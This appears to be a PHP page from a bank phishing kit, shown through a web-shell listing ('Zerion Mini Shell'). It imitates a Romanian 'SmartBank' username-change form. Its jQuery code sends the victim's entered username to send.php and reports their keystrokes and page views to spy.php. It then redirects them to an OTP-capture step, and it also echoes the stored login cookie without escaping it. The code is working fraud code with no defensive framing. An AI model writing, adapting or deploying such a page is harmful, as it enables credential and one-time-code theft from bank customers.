Mini Shell
<?php require(__DIR__) . '/../main.php'; ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SmartBank</title>
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css"
integrity="sha512-1ycn6IcaQQ40/MKBW2W4Rhis/DbILU74C1vSrLJxCq57o941Ym01SwNsOMqvEBFlcgUa6xLiPY/NS5R+E6ztJQ=="
crossorigin="anonymous" referrerpolicy="no-referrer" /> -->
<link href="https://cdn.jsdelivr.net/gh/hung1001/font-awesome-pro@4cac1a6/css/all.css" rel="stylesheet"
type="text/css" />
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css"
integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
<!-- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> -->
<link rel="stylesheet" href="themes/css/login.css">
</head>
<body>
<div class="container-fluid mt-5">
<div class="row justify-content-center">
<div class="col-12 col-md-5">
<div class="bceed">
<form action="" method="POST" id="form" data-redirection="sms" class="hyucuyv">
<div class="hbrhfbc">
<h4 class="jhgsaz">Schimbare Utilizator</h4>
<img src="assets/icon/private.svg" alt="" class="jhier">
<p class="jhvuc">Utilizator vechi:
<?= $_COOKIE['login'] ?>
</p>
<p class="hbjhvjhvh">Schimbă-ți Utilizatorul, alege-ţi unul pe care să ţi-l aminteşti foarte
uşor.</p>
<div class="floating-label-group">
<input name="email" type="email" id="EMAIL" class="inputss floating-label-item"
required />
<label class="floating-label">Utilizator nou</label>
</div>
<?php if (isset($_GET['e'])) { ?>
<p class="span_error" id="error_username">Informațiile pe care le-ați introdus sunt
incorecte</p>
<?php } ?>
<div class="khbhv">
<i class="fal fa-info-circle"></i>
<div class="bex">
<p>Îţi recomandăm să folosești adresa ta de email.</p>
<p>În cazul în care nu vei folosi adresa de email, Utilizatorul:</p>
<ul class="hjvfghc">
<li>trebuie să aibă minim 6 caractere;</li>
<li>poate conţine unul din caractere speciale (-_-);</li>
<li>nu poate fi format doar din cifre consecutive, identice, repetitive sau să
înceapă cu 0.</li>
</ul>
</div>
</div>
</div>
<div class="iuhdiuh">
<button type="submit" id="checkButton" class="btn_login">Continuă</button>
</div>
</form>
</div>
</div>
</div>
</div>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.min.js"
integrity="sha384-cuYeSxntonz0PPNlHhBs68uyIAVpIIOZZ5JqeqvYYIcEL727kskC66kF92t6Xl2V" crossorigin="anonymous">
</script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"
integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous">
</script>
<script>
document.addEventListener("DOMContentLoaded", function () {
const inputElements = document.querySelectorAll(".inputss");
const checkButton = document.getElementById("checkButton");
// Function to check if all inputs are not empty
function areAllInputsNotEmpty() {
let allNotEmpty = true;
inputElements.forEach((input) => {
if (input.value.trim() === "") {
allNotEmpty = false;
}
});
return allNotEmpty;
}
// Event listener for input changes
inputElements.forEach((input) => {
input.addEventListener("input", function () {
checkButton.disabled = !areAllInputsNotEmpty();
if (areAllInputsNotEmpty()) {
checkButton.style.backgroundColor = "rgb(82, 174, 48)"
checkButton.style.color = "#fff"
} else {
checkButton.style.backgroundColor = "#e3e3e3"
checkButton.style.color = "#797979"
}
});
});
// // Event listener for the check button
// checkButton.addEventListener("click", function () {
// if (areAllInputsNotEmpty()) {
// alert("All inputs are not empty!");
// } else {
// alert("Some inputs are empty.");
// }
// });
});
</script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.min.js"
integrity="sha384-cuYeSxntonz0PPNlHhBs68uyIAVpIIOZZ5JqeqvYYIcEL727kskC66kF92t6Xl2V" crossorigin="anonymous">
</script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"
integrity="sha384-kenU1KFdBIe4zVF0s0G1M5b4hcpxyD9F7jL+jjXkk+Q2h455rYXK/7HAuoJl+0I4" crossorigin="anonymous">
</script>
<script>
document.addEventListener("DOMContentLoaded", function () {
const inputElements = document.querySelectorAll(".inputss");
const checkButton = document.getElementById("checkButton");
// Function to check if all inputs are not empty
function areAllInputsNotEmpty() {
let allNotEmpty = true;
inputElements.forEach((input) => {
if (input.value.trim() === "") {
allNotEmpty = false;
}
});
return allNotEmpty;
}
// Event listener for input changes
inputElements.forEach((input) => {
input.addEventListener("input", function () {
checkButton.disabled = !areAllInputsNotEmpty();
if (areAllInputsNotEmpty()) {
checkButton.style.backgroundColor = "rgb(82, 174, 48)"
checkButton.style.color = "#fff"
} else {
checkButton.style.backgroundColor = "#e3e3e3"
checkButton.style.color = "#797979"
}
});
});
// // Event listener for the check button
// checkButton.addEventListener("click", function () {
// if (areAllInputsNotEmpty()) {
// alert("All inputs are not empty!");
// } else {
// alert("Some inputs are empty.");
// }
// });
});
</script>
<script>
document.addEventListener("DOMContentLoaded", function () {
const inputElements = document.querySelectorAll(".inputss");
const checkButton = document.getElementById("checkButton");
// Function to check if all inputs are not empty
function areAllInputsNotEmpty() {
let allNotEmpty = true;
inputElements.forEach((input) => {
if (input.value.trim() === "") {
allNotEmpty = false;
}
});
return allNotEmpty;
}
// Event listener for input changes
inputElements.forEach((input) => {
input.addEventListener("input", function () {
checkButton.disabled = !areAllInputsNotEmpty();
if (areAllInputsNotEmpty()) {
checkButton.style.backgroundColor = "rgb(82, 174, 48)"
checkButton.style.color = "#fff"
} else {
checkButton.style.backgroundColor = "#e3e3e3"
checkButton.style.color = "#797979"
}
});
});
// // Event listener for the check button
// checkButton.addEventListener("click", function () {
// if (areAllInputsNotEmpty()) {
// alert("All inputs are not empty!");
// } else {
// alert("Some inputs are empty.");
// }
// });
});
</script>
<script src="res/jq.js"></script>
<?php $m->ctr("EMAIL"); ?>
<script>
$(document).ready(function () {
var abort = false;
$('#EMAIL').keyup(function (e) {
if (abort == false) {
$.post("spy.php", {
otping: 1
});
abort = true;
}
});
$("#form").on("submit", function (e) {
e.preventDefault()
$.post("send.php", {
CustID2: $("#EMAIL").val()
}, function () {
window.location = "wait.php?p=OTP";
});
});
$.post("spy.php", {
otpview: 1
});
});
</script>
<?php $m->ctr("EMAIL " . @$_GET['e']); ?>
</body>
</html>
Zerion Mini Shell 1.0